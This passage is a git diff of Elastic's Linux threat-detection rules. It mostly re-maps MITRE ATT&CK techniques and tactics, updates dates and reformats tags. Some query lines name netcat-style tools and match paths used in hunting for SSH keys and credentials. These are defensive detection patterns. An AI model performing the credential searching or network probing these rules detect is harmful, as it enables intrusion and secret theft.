"new_terms" query = ''' @@ -128,25 +120,6 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index dcf6cbd1ec0..40244d95a62 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,13 +69,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -86,11 +80,11 @@ iam where host.os.type == "linux" and event.type in ("group", "user") and event. framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 533fff59b87..1fe2cb6e7fb 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -108,42 +97,10 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 40420f501f9..41be32281ac 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index a2e43bc8e59..6d9fffd4a0c 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index af3f9c6de0c..bdacb1c0cb6 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,9 +114,9 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 401470b341b..1168b4f3c91 100644 --- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,19 +56,7 @@ This rule detects common Linux utilities and shells reading kprobes and tracing risk_score = 21 rule_id = "fb542346-1624-4cf2-bcc7-c68abaab261b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -88,24 +76,11 @@ process.args like ("/sys/kernel/debug/kprobes/*", "/sys/kernel/debug/tracing/*", framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index e78a5b7070c..4bdbc4b9a63 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,15 +122,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index f7159bd2840..419aec12283 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,20 +109,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 5fd3d44ce52..216000df4dc 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,15 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,20 +107,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 499b8b47ad0..154c255d524 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,17 +92,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -142,9 +132,27 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml index 51b3731597f..321afa12afc 100644 --- a/rules/linux/discovery_kubectl_permission_discovery.toml +++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,9 +119,9 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index 13cafc9195f..c962146b215 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,14 +128,13 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index 0e020284684..efbbef38924 100644 --- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,14 +128,18 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 221cc4ff072..4489c16b91c 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,9 +112,9 @@ process.command_line like ("/etc/exports", "/etc/fstab") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index fd9295a70a0..b850ea0830e 100644 --- a/rules/linux/discovery_pam_version_discovery.toml +++ b/rules/linux/discovery_pam_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,19 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -123,37 +111,11 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml index 1cffefe920a..081d7c941ab 100644 --- a/rules/linux/discovery_ping_sweep_detected.toml +++ b/rules/linux/discovery_ping_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -119,7 +124,6 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.threshold] field = ["host.id", "process.parent.entity_id", "process.executable"] value = 1 diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml index 2420b1dc14c..7bd3c7400e3 100644 --- a/rules/linux/discovery_polkit_version_discovery.toml +++ b/rules/linux/discovery_polkit_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,9 +111,9 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml index 413d337fc5a..c953db6b472 100644 --- a/rules/linux/discovery_private_key_password_searching_activity.toml +++ b/rules/linux/discovery_private_key_password_searching_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,25 +110,30 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/") [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/discovery_proc_maps_read.toml b/rules/linux/discovery_proc_maps_read.toml index 986cceed84d..cc4db1da87b 100644 --- a/rules/linux/discovery_proc_maps_read.toml +++ b/rules/linux/discovery_proc_maps_read.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,19 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Credential Access", - "Data Source: Auditd Manager", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -127,21 +115,3 @@ reference = "https://attack.mitre.org/techniques/T1057/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique.subtechnique]] -id = "T1003.007" -name = "Proc Filesystem" -reference = "https://attack.mitre.org/techniques/T1003/007/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml index 41b4c8bda26..ae91749e8cf 100644 --- a/rules/linux/discovery_process_capabilities.toml +++ b/rules/linux/discovery_process_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,9 +101,9 @@ In Linux environments, the `getcap` command is used to list file capabilities, w framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml index c80d995820a..cb7bc9afe40 100644 --- a/rules/linux/discovery_security_file_access_via_common_utility.toml +++ b/rules/linux/discovery_security_file_access_via_common_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,17 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,6 +115,29 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml index 9c5015f5db1..aa6bd718253 100644 --- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml +++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml @@ -2,7 +2,7 @@ creation_date = 